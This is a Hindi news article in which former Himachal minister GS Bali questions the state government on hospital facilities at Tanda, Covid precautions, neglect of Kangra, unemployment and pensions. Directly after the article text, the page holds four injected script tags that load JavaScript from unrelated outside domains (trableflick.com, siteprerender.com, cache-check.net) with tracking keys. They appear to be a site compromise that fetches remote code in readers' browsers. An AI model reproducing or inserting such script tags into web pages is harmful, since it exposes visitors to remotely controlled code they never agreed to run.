GS बाली का सरकार पर हमला, स्वास्थ्य, बेरोजगारी, कोरोना पर किये सरकार से सवाल

<p>एक बार फ़िर कई मुद्दों को लेकर पूर्व मंत्री जीएस ने सरकार पर सवालों के कटघरे में खड़ा किया। जीएस बाली ने ख़ास तौर पर स्वास्थ्य सुविधाओं को निशाने पर लिया और सरकार से सवाल किये। उन्होंने कहा कि कई दिनों से कुछ ग़रीब लोग उनके पास आ रहे हैं औऱ स्वास्थ्य सुविधाओं से आहत रह रहे हैं। टांडा प्रदेश का दूसरा बड़ा अस्पताल है जो आधे हिमाचल का इलाज करता है। सरकार यहां सभी सुविधाएं प्रदान करे। कांग्रेस सरकार के कार्यकाल में जो सुविधाएं बनाई थी उनमें भी फर्जीगिरी की जा रही है। ख़ासतौर सुपर स्पेशलिस्ट ब्लॉक औऱ उनके कार्ड का खास ख्याल रखा जाए।</p>

<p>जीएस बाली ने कहा कि अब दिपावाली का सीज़न आ रहा और हर प्रकार की पाबंदी औऱ पंजीकरण खोल दिये गए हैं। ऐसे में सरकार को पूरी सावधानियां बरतनी चाहिए। इसके तहत अभी से ही सरकार पूरी तैयारी कर लेनी चाहिए। क्योंकि डब्ल्यूएचओ ने साफ कहा है कि अभी कोरोना और बढ़ने की आशंका है।</p>

<p><span style=”color:#e74c3c”><strong>कांगड़ा जिला की अनदेखी का सवाल…??</strong></span></p>

<p>जीएस बाली ने कहा कि कांगड़ा में सरकार ने क्या किया है। एक भी प्रोजेक्ट आया हो तो उसका कोई नाम तक बता दे। सरकार सेंट्रल यूनिवर्सिटी का हल्ला करते थी लेकिन अभी तक कुछ नहीं आया। दोनों और इनकी सरकार है लेकिन कुछ नहीं हो रहा। कांगड़ा ट्रेन के विस्तार पर पर कोई बात नहीं बनी। केंद्रीय मंत्री पीयूष गोयल हवा हवाई बात करके चले गए। कांग्रेस के टाइम पर जो काम हुआ है वे ही काम आज देखने को मिलता है।</p>

<p><span style=”color:#f39c12″><strong>पीसीसी चीफ बदलने की अटकलों पर जवाब…</strong></span></p>

<p>पीसीसी चीफ के बदले जाने की अटकलों पर जीएस बाली ने कहा कि लीडर शीप मे वही होना चाहिए जिसको लोग मानें। ये हाईकमान तय करता है कि लीडरशीप चेंज करना है या नहीं। फिलवक़्त मुझे ये लगता है कार्यकर्ता हताष है। क्योंकि कोरोना के कारण कांग्रेस जमीनी स्तर पर नहीं रह पाई। जब तक कार्यकर्ता के साथ नहीं मिलेंगे-जाएंगे, तब तक कार्यकर्ता हताष रहेगा। 2022 में बदलाव होना है लेकिन सभी को एकसाथ चलना होगा। कुछ पार्टी के लोग अलग दिशा में चल रहे हैं जो नुकसान पहुंचाएंगे।</p>

<p>पूर्व मंत्री ने कहा कि आज सबसे गंभीर मुद्दा बेरोजगारी का है। बेरोजगारों को खुध अपनी जंग लड़ने के लिए सड़कों पर उतरना चाहिए। हम तो पहले भी बेरोजगारों के खिलाफ लड़ते रहे हैं औऱ आगे भी जंग रथ यात्रा जैसी जंग जारी रहेगी। लेकिन अब वक़्त आ गया है कि युवाओं को अपने हक़ औऱ हितों के लिए खुद लड़ना ही होगा। फ़िर चाहे सरकार किसी की भी हो। हमने अपनी सरकार के दौरान जी जान के साथ भत्ता लगवाया था लेकिन इस सरकार ने फिर बंद कर दिया।</p>

<p><span style=”color:#27ae60″><strong>सवालों के जवाब में बोले जीएस बाली…</strong></span></p>

<p>कर्मचारियों की मांग है कि पुरानी पेंशन स्कीम आनी चाहिए। समय आने पर इसपर विस्तार से चर्चा होगी। एक्सपर्ट की टीम की कमेटी बनाई जाएगी जो सारा लेखा जोखा तैयार करेगी।<br />
अनिल शर्मा के कांग्रेस की टिकट से चुनाव लड़ने के सवाल पर जीएस बाली ने कहा कि ये भविष्य की बात है। अभी तक वे बीजेपी विधायक है और उन्होंने कुछ लिखकर नहीं दिया। बाकी सब हाईकमान तय करेगा।<br />
युवा कांग्रेस के चुनाव में हस्तक्षेप के सवाल पर जीएस बाली ने कहा कि मुझे जरूरत नहीं। युवा काफी है हस्तक्षेप करने के लिए। जो सदस्यता थी उसपर हमें जरूर कुछ हैरानी है।<br />
थर्ड फ्रंट की संभावनाएं काफी तेज चल रही हैं। बीजेपी से लोग अलग हो रहे हैं और वे बाकी पार्टी का साथ नहीं दे रहे।<br />
कंडक्टर भर्ती पेपर लीक मामले में कहा कि पहले तो उक्त छात्र औऱ उसे अंदर जाने वाले शिक्षण संस्थान के खिलाफ कार्रवाई होनी चाहिए। अगर कोई एक्शन नहीं होता तो साफ है कि इसमें मिलीभगत चल रही हैं।<br />
पूर्व मुख्यमंत्री वीरभद्र सिंह के सवाल पर उन्होंने कहा कि वे पार्टी के वरिष्ठ नेता हैं। उनके राजनीति छोड़ने से शिमला ही नहीं बल्कि पूरे हिमाचल में कई जगह नुकसान होगा। फिलहाल वे अपना काम पूरा करेंगे औऱ अगर हमारी जरूरत पड़ी तो हम जरूर जाएंगे।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1603965731308″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

डॉक्टर बनना केवल पेशा नहीं, तपस्या है: आरएस बाली

  RS Bali promises improved healthcare services: हिमाचल प्रदेश मेडिकल ऑफिसर्स एसोसिएशन जिला कांगड़ा की…

5 hours ago

विधानसभा सत्र के लिए धर्मशाला तैयार, सुरक्षा और यातायात पर रहेगा विशेष ध्यान

Dharamshala Winter Assembly Session : आगामी विधानसभा शीतकालीन सत्र की तैयारियों के मद्देनजर उपायुक्त कांगड़ा…

8 hours ago

मंडी में गृहकर बदलाव पर विवाद, पूर्व स्वरूप बहाल करने की मांग

Mandi Property Tax Objections:मंडी नगर निगम द्वारा गृहकर अधिसूचना जारी करने के बाद शहरवासियों से…

10 hours ago

धलोट महिला मंडल ने उठाई आवाज, भवन निर्माण के लिए भूमि की मांग

  Mahila Mandal Dhalot: धलोट के महिला मंडल ने भवन निर्माण की मांग को लेकर…

10 hours ago

कांग्रेस सरकार भोटा अस्पताल बंद नहीं होने देगी, भाजपा कर रही राजनीति: सुरेश कुमार

BJP vs Congress on Hospital Closure: हमीरपुर जिले के भोरंज के कांग्रेस विधायक सुरेश कुमार…

10 hours ago